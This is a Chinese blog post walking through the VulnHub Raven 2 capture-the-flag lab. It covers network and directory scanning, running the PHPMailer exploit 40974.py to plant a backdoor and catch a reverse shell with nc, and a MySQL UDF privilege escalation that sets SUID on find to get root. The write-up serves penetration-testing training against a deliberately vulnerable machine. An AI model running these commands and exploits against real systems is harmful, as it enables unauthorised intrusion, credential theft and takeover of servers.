vulnhub靶机rava2渗透测试

最新推荐文章于 2024-05-15 09:15:00 发布
最新推荐文章于 2024-05-15 09:15:00 发布
阅读量457 收藏
点赞数 3
分类专栏: vulnhub 文章标签: vuluhab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Long_gone/article/details/101620586
版权

首先利用netdiscover这个工具来进行对靶机的IP扫描:

netdiscover

在这里插入图片描述
然后可以判断出靶机IP为192.168.34.225,接着就用nmap扫描一下靶机的端口开放情况:

nmap -A 192.168.34.225

在这里插入图片描述
发现靶机开放了22,80,111这3个端口,然后就先访问一下80端口:
在这里插入图片描述
接着就是用dirb工具扫描目录,进行目录的爆破:

dirb http://192.168.34.225

在这里插入图片描述
在扫描出来的目录中,经过挨个的点开查看后发现vendor这个目录的PATH这文件中有这我们要找的第一个flag:
在这里插入图片描述
不过它还把网站的目录地址也爆出来了,然后把每个文件都点开看一下:
在这里插入图片描述
在README.md这个文件中发现靶机服务器安装了PHPMailer:
在这里插入图片描述
在VERSION这个文件中找到了这个php服务器的版本号:
在这里插入图片描述
然后使用searchsploit工具查看一下php的版本漏洞:

searchsploit PHPMailer

在这里插入图片描述
在这里我们选用:
在这里插入图片描述
来进行攻击,我们先把这个文件给复制出来:

cp /usr/share/exploitdb/exploits/php/webapps/40974.py ./

然后我们把这个文件进行编辑:

vim 40974.py

开头要加:

#!/usr/bin/python
# -*- coding: utf-8 -*-

以防出现乱码或者错误:
在这里插入图片描述
然后修改配置文件,修改的地方有:

crget = ‘靶机ip’
backdoor = ‘生成php文件名’
(\‘kali的ip’\, 端口)
/tmp -X/所生成的php文件的路径 server\

修改完以后是这样的:
在这里插入图片描述
然后运行这个文件:

python 40974.py

在这里插入图片描述
然后再监听这个网页从而反弹shell:

nc -lvp 7777

在这里插入图片描述
成功连接靶机后开始寻找flag:

find / -name flag*

在这里插入图片描述
然后就可以看到所有的flag,从而可以得到flag2和flag3:
在这里插入图片描述
Flag3是个图片,所以直接网页打开这个就好:
在这里插入图片描述
完了以后,我们先用python来获取个pty:

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
至于flag4,因为它在root下,所以要进行提权才可以得到,
我们上传个LinEnum.sh对LINUX进行信息搜集,方便提权使用,项目地址为:
https://github.com/rebootuser/LinEnum
这里就要使用到搭建简易服务器进行下载了,下载好以后加权运行:

chmod +x LinEnum.sh
./LinEnum.sh

在这里插入图片描述
在这里插入图片描述
看到这个我们可以知道靶机使用给mysql的版本号,如果MySQL版本<=5.7.14,5.6.32,5.5.51的话,可以利用MySQL-Exploit-Remote-Root-Code-Execution-Privesc漏洞进行提权。
我们从https://www.exploit-db.com/exploits/1518获取EXP,先在kali中生成so文件:

wget https://www.exploit-db.com/download/1518
mv 1518 1.c
gcc -g -c 1.c
gcc -g -shared -o  1.so 1.o -lc
mv 1.so 2.so

在这里插入图片描述
然后同样在靶机上用wget下载2.so
在这里插入图片描述
我们先回到网站的根目录用ls命令查看一下,可以看到有wordpress(wp):
在这里插入图片描述
进去看一下wp的配置文件:
在这里插入图片描述
查看一下wp-config.php:
在这里插入图片描述
在这里面可以找到myslq的账号和密码:
在这里插入图片描述
数据库账号:root
数据库密码:R@v3nSecurity
然后进行数据库提权:

use msyql

在这里插入图片描述

create table foo(line blob);

(创建一个名为foo的blob数据类型(二进制对象)的数据表)
Insert into foo values(load_file(‘/tmp/sdfz_udf.so’));
(把’/tmp/sdfz_udf.so’文件插入到foo这个数据表中)

Select * from foo into dumpfile ‘usr/lib/mysql/plugin/sdfz_udf.so’;

(把foo里面的数据导出到‘usr/lib/mysql/plugin/sdfz_udf.so’下)
在这里插入图片描述

Create function do_system returns integer soname ‘sdfz_udf.so’;

(创建一个do_system函数,并返回整数类型的数据)
在这里插入图片描述

Select * from myslq.func

(查看mysql数据库中func表里的所有数据)
在这里插入图片描述

Select do_system(‘chmod u+s /usr/bin/find’);

(调用这个函数给用户的find命令增加s权限)
查看一下当前的权限:
在这里插入图片描述
然后用find命令进行提权:

find / -exec “/bin/sh”  \;

(用find / -exec 命令去执行 “/bin/sh”)
在这里插入图片描述最后得到flag.4

参考:https://blog.csdn.net/nzjdsds/article/details/93971746

Long_gone
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
构建完善的安全渗透测试环境:推荐工具、资源和下载链接
weixin_43263566的博客
02-14 3586
安全渗透环境准备(工具下载)
Vulnhub】搭建Vulnhub靶机
zg_111的博客
03-28 8893
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
vulnhub靶机EVM渗透笔记
liver100day的博客
08-02 1188
文章标题1.环境搭建2.信息收集2.1 主机发现3.漏洞利用4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:EVM IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/evm-1,391/ 2.信息收集 2.1 主机发现 我们要进行渗透,首先得知道目标靶机的IP地址,否则将无从做起 arp-scan -l 3.漏洞利用 4.提权 5.总结 ...
漏洞靶场实战-Vuluhub medium_socnet
最新发布
qq_44005305的博客
05-15 812
Vulnhub 是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地 VM 打开即可,但是很多靶场不兼容 Vmware 比如本次用的靶场就不兼容,所以推荐 VirtualBox下载的是一个 ovf 后缀的文件,打开 VirtualBox,导入导入完毕后根据需求编辑虚拟机设置。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 2050
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
[vulnhub系列]Chili-靶机
薛定谔嘚喵博客
03-07 1948
在该靶机渗透流程中,前端的信息收集尤为重要,爆破web网页中,查看源代码是很有益处的,可以看到一些敏感信息。以及一些爆破工具的使用,hydra工具是此次渗透的关键,爆破出了ftp账号密码;然后使用ftp端口服务进行ftp权限登陆,查看可执行文件类型,而后生成shell脚本,访问网页,进行反弹shell,得到shell;
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub系列靶机-THM-ContainMe-v4
来日可期的博客
09-16 1191
详细解析:通过执行此命令,wfuzz将发送HTTP请求到目标URL,并使用字典文件中的词进行模糊测试。wfuzz是一款用于Web应用程序模糊测试的开源工具,它可以帮助用户识别Web应用中存在的漏洞和安全问题。之前在查看etc下的passwd文件的时候有一个mike用户,到该用户的目录下面查看是否有有用的信息。但是之前在mike用户的目录下还发现了.ssh 的文件,查看里面有什么。发现我们拼接的参数执行了,试着查看etc下的passwd文件。:这里将文件下载到tmp目录下,因为其他的目录没有写入的权限。
看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 1
Aluxian_的博客
03-22 2856
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机的类型也是第一次做,比较简单。2.smb共享 smbmap枚举(工具得使用)ssh私钥登入3.脏牛提权提权希望对刚入门得小白有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
渗透项目(三):Raven
Ays.Ie的博客
10-24 701
本文记录了作者的第三个渗透项目,努力学习的一天,将自己在渗透时的思路和渗透方法记录下来,为了更好的理解。继续努力~
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 3415
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
vulnhub - EVM
weixin_46164380的博客
03-27 188
EVM靶机 网段扫描:arp-scan -l 扫描靶机开启的服务 开启的服务比较多,有ssh服务、有http服务;还有三个邮件协议110、139、445; Ps:samba可以进行枚举 共享 enum4linux -S 192.168.56.103 遍历目录发现:info.php 并且还是wordpress框架 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ctK...
VulnHub】Raven: 2靶机渗透测试
大方子
06-28 4076
总结和思考: 使用netdiscover探测内网存活主机 PHPMailer的漏洞反弹得到shell Python版的EXP修改 查看wordpress的wp-config.php配置文件得到数据库账号密码 MySQL版本 <= 7.14 5.6.32 5.5.51 可以利用UDF提权 KALI对EXP的编译 给程序chmod u+s 增加suid权限,可以以root权限运...
【HTB系列】靶机LaCasaDePapel的渗透测试
大方子
08-07 3428
(因为是转发来的,若出现排版,乱码等问题就直接看有道的文档)有道分享链接地址: 文档:【HTB系列】靶机LaCasaDePapel的渗透测... 链接:http://note.youdao.com/noteshare?id=a475032917f4ec0bb32ce727d27509fd&sub=9534965F4D854085A4051A9957ADA6AD 知识点: 1. ...
vulnhub之lampiao实战攻略
weixin_43862283的博客
04-14 596
** vulnhub之lampiao实战攻略 ** 0x01 环境及配置 难度 : easy 下载地址 : https://mega.nz/#!aG4AAaDB!CBLRRYQsAhTOyPJqyjC0Blr-weMH9QMdYbPfMj0LGeM 0x02 正题:攻击开始 第一步,使用nmap对内网进行扫描,获取靶机IP地址(192.168.34.153) 在获取IP地址后,使用nmap对该I...
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值